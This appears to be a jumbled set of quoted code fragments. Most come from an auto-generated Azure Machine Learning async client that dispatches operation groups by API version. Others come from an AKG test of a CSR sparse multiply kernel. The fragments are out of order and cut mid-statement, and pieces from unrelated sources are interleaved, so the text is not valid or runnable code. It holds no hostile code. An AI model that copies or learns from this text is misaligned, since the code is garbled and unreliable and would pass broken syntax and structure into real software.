:class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version", "== 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {}", 
"api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version", "'2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does", ":class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations", "ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance", "import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as", "does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` *", "self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version", "* 2022-05-01: 
:class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "api_version = self._get_api_version('datasets_v1') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif", "'1.5.0': from ..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01':", "import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations as OperationClass elif api_version ==", "group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on", "depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01:", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version: *", "does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, 
self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else:", "models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version =", "'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0',", "{} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "== '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {}", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise", "the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version ==", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview:", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version", "version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: 
:class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version =", "{} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "= None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type:", "= self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else:", "'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the API", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version))", "else: raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client,", "self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise", "from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API version {} does not", "from ..v2022_05_01 import models return models raise ValueError(\"API version {} is not available\".format(api_version))", "API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: 
:class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version", "== '2021-10-01': from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "'2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "\"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as", "API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0':", "{} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "..registry_discovery.aio.operations import 
AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>`", "def models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version", "version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview:", "group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif", "2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01':", "2022-02-01-preview: 
:class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01':", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to", "on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>`", "group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on", "..dataset_dataplane.aio.operations import DatasetControllerV2Operations as OperationClass else: raise ValueError(\"API version {} does not have", "from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", ") @classmethod def _models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items()", "= AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = 
AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif", "self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass else: raise", "\"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts')", "* 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior", "VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass", "version. The api-version parameter sets the default API version if the operation group", "* 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources')", "to a particular api-version and/or profile. 
The profile sets a mapping between an", "depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if", "\"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations')", "else: raise ValueError(\"API version {} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client,", "from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>`", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version ==", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version))", "'2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version: 
*", "version {} does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if", "..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does not have", "{} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance", "does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "else: raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client,", "\"\"\"Instance depends on the API version: * 1.5.0: 
:class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status')", "from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if", "= ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint':", "if the operation group is not described in the profile. 
:param credential: Credential", "BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: *", "* 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version ==", "\"\"\" api_version = self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from", "def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version", "not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self):", "does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version {} 
does", "# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. #", "1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0':" ]
[ "compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform", "output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape,", "def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim", "len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must have the", "ib.for_range(0, end - start, name='j') as j: pos = start + j with", "start, name='j') as j: pos = start + j with ib.if_scope(pos < end):", "(1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx,", "print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source", "as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with", "scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2),", "print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx,", "num_rows, name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i +", "{}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source =", "output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype,", "target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if", "\"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name !=", 
"with ib.for_range(0, end - start, name='j') as j: pos = start + j", "not res: mod_source = mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error", "!= \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]:", "== len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and", "akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def", "target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data,", "need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const(", "pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val *", "1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand =", "ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense", "(dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res =", "format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def", "= get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim =", 
"ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j') as j: pos", "+ sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx],", "j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos)", "lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1,", "dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1,", "= expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape,", "expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] //", "gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as", "pos = start + j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos)", "rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if", "tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling", "ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos,", "kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype)", "with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope():", "ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end - start,", "dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test 
{}\".format(\"Pass\" if res else \"Failed\"))", "same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape)", "sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and", "< broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0,", "test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"}", "len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim =", "op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output", "and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] <", "end - start, name='j') as j: pos = start + j with ib.if_scope(pos", "val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val", "broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows,", "attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs =", "tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils", "output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx,", "with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope():", "\"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype,", "2-dim sparse tensor\" 
assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and", "2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype ==", "= to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list, target=target_name,", "< len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim", "pos, val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name", "i + 1) with ib.for_range(0, end - start, name='j') as j: pos =", "shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <=", "sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight", "get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape))", "attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx,", "from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import", "AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect],", "from akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from", "[shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape =", "pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense,", "row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start =", ") output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, 
sparse_data, col_idx, row_idx, output),", "the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape =", "topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor", "+ 1) with ib.for_range(0, end - start, name='j') as j: pos = start", "ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with", "sparse_data.dtype, \"data and weight must have the same dtype\" num_rows = row_idx.shape[0] -", "< end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output,", "j: pos = start + j with ib.if_scope(pos < end): val = ib.load(sparse_data,", "with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with", "ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i,", "utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, 